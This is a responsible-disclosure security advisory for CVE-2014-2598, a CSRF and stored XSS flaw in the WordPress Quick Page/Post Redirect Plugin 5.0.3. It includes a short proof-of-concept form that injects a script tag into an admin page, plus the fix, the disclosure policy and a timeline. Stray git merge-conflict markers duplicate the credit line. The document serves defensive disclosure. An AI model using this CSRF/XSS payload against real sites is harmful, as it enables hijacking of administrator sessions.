61 lines
No EOL
2.4 KiB
Text
61 lines
No EOL
2.4 KiB
Text
Details
|
||
================
|
||
Software: Quick Page/Post Redirect Plugin
|
||
Version: 5.0.3
|
||
Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/
|
||
Advisory ID: dxw-1970-1091
|
||
CVE: CVE-2014-2598
|
||
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
|
||
|
||
Description
|
||
================
|
||
CSRF and stored XSS in Quick Page/Post Redirect Plugin
|
||
|
||
Vulnerability
|
||
================
|
||
This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an admin user can be persuaded to visit a URL of the attacker’s choosing (via spear phishing for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs the admin’s browser can be made to do almost anything the admin user could typically do such as create/delete posts, create new admin users, or even exploit vulnerabilities in other plugins.
|
||
|
||
Proof of concept
|
||
================
|
||
Use the following form to introduce potentially malicious JavaScript:
|
||
<form method=\"POST\" action=\"http://localhost/wp-admin/admin.php?page=redirect-updates\">
|
||
<input type=\"text\" name=\"quickppr_redirects[request][]\" value=\""><script>alert(1)</script>\">
|
||
<input type=\"text\" name=\"quickppr_redirects[destination][]\" value=\"http://dxw.com/\">
|
||
<Input type=\"text\" name=\"submit_301\" value=\"1\">
|
||
<input type=\"submit\">
|
||
</form>
|
||
|
||
Mitigations
|
||
================
|
||
Upgrade to version 5.0.5 or later.
|
||
|
||
Disclosure policy
|
||
================
|
||
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
|
||
|
||
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
|
||
|
||
This vulnerability will be published if we do not receive a response to this report with 14 days.
|
||
|
||
Timeline
|
||
================
|
||
|
||
2014-03-21: Discovered
|
||
2014-03-24: Reported to plugins@wordpress.org
|
||
2014-04-07: No response; requested an alternative email address using the author’s contact form.
|
||
2014-04-08: Re-reported direct to author
|
||
2014-04-08: Author responded, and publication agreed on or before 2014-05-06
|
||
2014-04-10: Author reports issue fixed in version 5.0.5
|
||
|
||
<<<<<<< HEAD
|
||
|
||
Discovered by dxw:
|
||
================
|
||
Tom Adams
|
||
=======
|
||
|
||
Discovered by dxw:
|
||
================
|
||
Tom Adams
|
||
>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
|
||
Please visit security.dxw.com for more information. |